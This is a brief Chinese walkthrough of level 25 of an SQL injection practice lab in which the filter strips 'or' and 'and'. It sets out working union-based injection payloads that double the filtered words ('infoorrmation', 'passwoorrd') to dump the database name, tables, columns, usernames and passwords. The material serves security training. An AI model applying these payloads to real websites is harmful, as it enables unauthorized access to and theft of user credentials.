Less（25）Trick with OR & AND (过滤了or和and)

1.OR&AND欺骗

　　（1）测试一下

　　　　?id=1' #

　　　　

 　　　　?id=1' --+

　　　　

 　　看到id周围是单引号，但是第二种没有报错，可以注入

　　　　

 　　　　看一下php，发现会把or 和and 转义成空格

2.--+绕过，双写or和and

　　（1）爆库：？id=-1'  union select 1,2,database()--+

　　　　

　　（2）爆表：?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema="security" --+

　　　　

　　（3）爆列名：?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name="users" --+

　　　　

　　（4）爆值：

　　　　?id=-1' union select 1,2,group_concat(passwoorrd)from security.users --+

　　　　

　　　　 ?id=-1' union select 1,2,group_concat(username)from security.users --+